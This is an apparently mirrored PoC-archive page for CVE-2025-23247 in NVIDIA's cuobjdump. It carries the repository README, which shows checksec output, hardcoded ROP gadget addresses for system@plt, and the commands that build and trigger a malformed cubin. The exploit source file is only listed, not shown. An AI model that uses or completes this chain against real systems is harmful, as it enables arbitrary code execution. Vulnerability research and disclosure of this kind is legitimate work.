Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2025-23247 PoC — NVIDIA CUDA toolkit 安全漏洞

Source
https://github.com/SpiralBL0CK/CVE-2025-23247
Associated Vulnerability
Title:NVIDIA CUDA toolkit 安全漏洞 (CVE-2025-23247)
Description:NVIDIA CUDA Toolkit for all platforms contains a vulnerability in the cuobjdump binary, where a failure to check the length of a buffer could allow a user to cause the tool to crash or execute arbitrary code by passing in a malformed ELF file. A successful exploit of this vulnerability might lead to arbitrary code execution.
Description
wip for CVE-2025-23247 . ATM just crash PoC which shows we control buffer and offset, so we got aaw
Readme
# CVE-2025-23247
Epic Collab with @reubensammut :) as alaways :)
wip for CVE-2025-23247 . ATM just crash PoC which shows we control buffer and offset, so we got aaw. 
Bug from https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151

checksec ./cuobjdump
[*] '/home/vlad/cuobjdump'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)

Anyways we get no PIE so

uint64_t system_plt = 0x401d90;
uint64_t pop_rdi_ret = 0x402d1b;
uint64_t ret_gadget = 0x402d1c;  // Just a ret

Crashpoint
![Screenshot_from_2025-11-20_16-00-41 png-2](https://github.com/user-attachments/assets/0e319b6d-2444-4e22-9479-35e976692a38)

gcc -o modify_simple modify_simple.c
vlad@Vlad-PC:~$ ./modify_simple simple.cubin modified_simple2.cubin
Created modified_simple2.cubin with vulnerable .nv_debug_source section
Run: ./cuobjdump --dump-elf modified_simple2.cubin

And for the cuda kernel

nvcc -ptx simple.cu -o simple.ptx
nvcc -cubin simple.ptx -o simple.cubin --generate-line-info
or
nvcc -cubin simple.cu -o simple.cubin --generate-line-info
File Snapshot

 [4.0K]  /data/pocs/8aae502ef489f69646a21af58f24fd46c7b8d058
├── [4.0K]  modify_simple.c
├── [1.1K]  README.md
└── [ 168]  simple.cu

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →